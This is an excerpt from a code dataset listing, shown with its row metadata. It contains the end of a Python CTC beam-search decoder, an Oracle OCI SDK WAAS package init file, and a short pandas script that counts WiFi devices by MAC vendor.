newLabeling = labeling + (c,)
# if new labeling contains duplicate char at the end, only consider paths ending with a blank
if labeling and labeling[-1] == c:
prNonBlank = mat[t, c] * last.entries[labeling].prBlank
else:
prNonBlank = mat[t, c] * last.entries[labeling].prTotal
# add beam at current time-step if needed
addBeam(curr, newLabeling)
# fill in data
curr.entries[newLabeling].labeling = newLabeling
curr.entries[newLabeling].prNonBlank += prNonBlank
curr.entries[newLabeling].prTotal += prNonBlank
# apply LM
applyLM(curr.entries[labeling], curr.entries[newLabeling], classes, lm)
# set new beam state
last = curr
# normalise LM scores according to beam-labeling-length
last.norm()
# sort by probability
bestLabelings = last.sort()[:beamWidth] # get most probable labeling
output = []
for bestLabeling in bestLabelings:
# map labels to chars
res = ''
for l in bestLabeling:
res += classes[l]
output.append(res)
return output
def testBeamSearch():
"test decoder"
classes = 'ab'
mat = np.array([[0.4, 0, 0.6], [0.4, 0, 0.6]])
print('Test beam search')
expected = 'a'
actual = ctcBeamSearch(mat, classes, None)
print('Expected: "' + expected + '"')
print('Actual: "' + actual + '"')
print('OK' if expected == actual else 'ERROR')
if __name__ == '__main__':
testBeamSearch()
| 39.052941
| 141
| 0.654918
|
9aef3969df6b62774222adcb30e4ed59bff176bc
| 769
|
py
|
Python
|
src/oci/waas/__init__.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/waas/__init__.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/waas/__init__.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from __future__ import absolute_import
from .redirect_client import RedirectClient
from .redirect_client_composite_operations import RedirectClientCompositeOperations
from .waas_client import WaasClient
from .waas_client_composite_operations import WaasClientCompositeOperations
from . import models
__all__ = ["RedirectClient", "RedirectClientCompositeOperations", "WaasClient", "WaasClientCompositeOperations", "models"]
| 51.266667
| 245
| 0.819246
|
8cc87ba0bfc6f7f8f86e491bb96b9e67e7bf9db1
| 621
|
py
|
Python
|
app/distribution_check.py
|
AloneGu/wifi_analyse_demo
|
904bfcd5392735004edc15623985e5c04293aec4
|
[
"Apache-2.0"
] | null | null | null |
app/distribution_check.py
|
AloneGu/wifi_analyse_demo
|
904bfcd5392735004edc15623985e5c04293aec4
|
[
"Apache-2.0"
] | null | null | null |
app/distribution_check.py
|
AloneGu/wifi_analyse_demo
|
904bfcd5392735004edc15623985e5c04293aec4
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import pandas as pd
from manuf import MacParser
VENDOR_DATA = './app/static/wifi_data/vendor_data'
WIFI_DATA = './app/static/wifi_data/t1.csv'
SS_THRES = -100
def get_wifi_data():
vendor_checker = MacParser(VENDOR_DATA)
df = pd.read_csv(WIFI_DATA, usecols=[0, 3, 6], header=None)
df.columns = ['timestamp', 'mac_address', 'signal_strength']
df = df[df.signal_strength > SS_THRES]
df['vendor'] = map(vendor_checker.get_manuf, df['mac_address'].values)
s = df.groupby('vendor').size().sort_values(ascending=False)[:6] # get series
return list(s.index),list(s.values)
| 34.5
| 82
| 0.695652
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.